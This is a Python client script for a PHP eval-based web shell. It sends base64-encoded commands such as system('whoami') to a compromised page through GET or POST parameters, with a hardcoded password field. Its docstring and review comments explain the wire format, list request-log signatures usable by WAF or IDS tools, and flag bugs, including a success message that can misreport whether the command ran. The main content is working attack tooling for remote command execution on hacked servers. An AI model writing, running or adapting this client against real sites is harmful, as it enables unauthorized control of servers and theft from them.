#!/usr/bin/python
#coding=utf-8
import requests,base64
def cmd(url,method,passwd,cmd):
    """Send one command string to a PHP eval-style web shell and print the outcome.

    The request carries a PHP stub ``@eval(base64_decode($_GET[z0]));`` (or the
    ``$_POST`` variant) in the parameter named by *passwd*, and the
    base64-encoded *cmd* in the parameter ``z0``.

    Args:
        url: Full URL of the shell page.
        method: ``'get'`` or ``'post'``; any other value sends no command.
        passwd: Name of the request parameter the shell evaluates.
        cmd: Code to run remotely (the example in the original comment is a
            PHP ``system(...)`` call); it is base64-encoded before sending.

    Returns:
        0 when the initial probe fails or does not answer 200; otherwise
        None after printing a status line.

    Detection note: the parameter name ``z0`` holding base64 data, a parameter
    value containing ``eval(base64_decode(``, and the fixed POST field
    ``pass=Sn3rtf4ck`` are all visible in request logs and usable as
    WAF/IDS signatures.
    """
    # Split the URL into host part and remote path,
    # e.g. ip 127.0.0.1:80, Rfile=/1111/x.php?pass=Sn3rtf4ck
    try:
        url.index("http")
        # "http" present: drop 7 characters ("http://") ==> 127.0.0.1:80/1110/x.php
        prefix_len = 7
    except:
        # No "http" in the URL: 8 characters are dropped instead.
        prefix_len = 8
    # NOTE(review): an "https://" URL also takes the 7-character branch, which
    # leaves a leading "/" and makes ip the empty string.
    segments = url[prefix_len:].split("/")
    ip = str(segments[0])
    # Rfile is rebuilt here but never read again in this function.
    Rfile = "".join("/" + str(seg) for seg in segments[1:])

    # Check that the shell page exists before sending anything to it.
    try:
        res = requests.get(url,timeout=3)
    except:
        print("[-] %s ERR_CONNECTION_TIMED_OUT" %url)
        return 0
    if res.status_code != 200:
        print("[-] %s Page Not Found!" %url)
        return 0

    # Run the command; PHP side may use system, exec, passthru, backticks, shell_exec.
    # Wire format: a=@eval(base64_decode($_GET[z0]));&z0=c3lzdGVtKCJ3aG9hbWkiKTs=
    # NOTE(review): b64encode needs bytes on Python 3; a str argument raises
    # TypeError there, so this presumably targets Python 2 -- confirm.
    payload = {'z0': base64.b64encode(cmd)}
    if method == 'post':
        # Fixed extra field sent with every POST.
        payload['pass'] = 'Sn3rtf4ck'
        payload[passwd] = '@eval(base64_decode($_POST[z0]));'
        try:
            res = requests.post(url,data=payload,timeout=3)
        except:
            pass
    elif method == 'get':
        payload[passwd] = '@eval(base64_decode($_GET[z0]));'
        try:
            res = requests.get(url,params=payload,timeout=3)
        except:
            pass

    # NOTE(review): if the command request raised (or method matched neither
    # branch), res is still the probe response, so the line printed below
    # reflects the probe and is not evidence that the command ran.
    template = "[+] %s Insert Sucessed!" if res.status_code == 200 else "[+] %s Insert Failed!"
    print(template % ip)